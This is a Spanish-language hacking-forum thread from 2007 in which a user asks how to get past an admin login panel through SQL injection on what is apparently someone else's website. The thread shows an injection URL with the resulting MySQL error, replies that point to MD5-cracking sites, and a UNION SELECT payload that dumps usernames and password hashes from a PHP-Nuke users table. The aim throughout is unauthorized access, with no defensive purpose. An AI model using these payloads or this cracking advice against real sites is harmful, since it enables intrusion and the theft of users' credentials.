Otro SQL mas facil - CPH hacking and security

121212
Recien llegado

Desconectado

Mensajes: 3

« : 21 de ſeptiembre de 2007, 04:27:28 »

He encontrado otra vulnerabilidad SQL, parece facil pero llevo media hora sin exito.
Se trata de un panel de administraccio n en el que puedes loguearte haciendo un post.
De la siguiente manera te da error :
/index.php?user=%20admin%20AND%20pass=''%20or%20'1'='1&pass=%00

el error es :
Invalid query: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '1'='1' AND pass='93b885adfe0da0 89cdf634904fd5 9f71'

Por lo que se ve el usuario puede ser autentificado si se quita la variable pass pero el problema es que si la quitas te sigue dando un resultado en MD5 de la variable en blanco.
Pongas lo que pongas en el campo 'pass' se combierte en MD5 y no tengo manera de saltar la autentificacio n.

Espero la ayuda de todos,
Un saludo


	En línea

_mÙëK§™_
NZ2

Desconectado

Mensajes: 154

Just me in a macro world!

Re: Otro SQL mas facil

« Respuesta #1 : 22 de ſeptiembre de 2007, 09:03:34 »

Manual SQL Injection by mueks

Para ver este enlace Registrate o Inicia Sesion

http://foro.portalhacker.net/index.php/topic,49625.0.html


	En línea

"podran kortar las flores...pero no detendran la primavera"

Para ver este enlace Registrate o Inicia Sesion
Manual XSS by mueks

Para ver este enlace Registrate o Inicia Sesion

Manual RFI by mueks

121212
Recien llegado

Desconectado

Mensajes: 3

Re: Otro SQL mas facil

« Respuesta #2 : 22 de ſeptiembre de 2007, 10:08:12 »

Esta muy bien ese manual pero no me ha ayudado porque los ejemplos que pone son para usuario y password sin encriptar.

Yo me refiero cuando la contraseña esta Md5

Un saludo


	En línea

Vanz!
Recien llegado

Desconectado

Mensajes: 1

Re: Otro SQL mas facil

« Respuesta #3 : 22 de ſeptiembre de 2007, 03:42:11 »

Lo que tienes es que buscar una lista de paginas webs para Crackear MD6

tienes
Para ver este enlace Registrate o Inicia Sesion

www.passcracki ng.ru

o "MD5 Cracking" en Google. Te resuelve el problema. Wink


	En línea

_mÙëK§™_
NZ2

Desconectado

Mensajes: 154

Just me in a macro world!

Re: Otro SQL mas facil

« Respuesta #4 : 22 de ſeptiembre de 2007, 07:49:25 »

Citar

Obteniendo un hash, listas de usuarios o administradore s.

Bueno, si no sabes que e sun hash, pues no se que haces parado por aquí ¬¬ te estas tardando en investigar Wink (
Para ver este enlace Registrate o Inicia Sesion )

Esto es simple, introducimos en una web vulnerable:

Citar
s%') UNION SELECT 0,user_id,username,user_password,0,0,0,0,0,0 FROM nuke_users/*

si la web es vulnerable, nos saldra el hash impreso en pantalla.

Ahora no sean vagos y vayance a bucar un desencriptador de hash xD

Muy simple, en una web vulnerable, si introduces:

Citar
s%') UNION SELECT 0,user_id,username,u ser_password,0,0,0,0 ,0,0 FROM nuke_users/*

te saldra una lista de usuarios

Y haci hay miles de sentencias que podriamos introducir…no todas funcionan para todos los servers…sin embargo…es un buen comienzo.


	En línea

Páginas: [1]

« anterior próximo »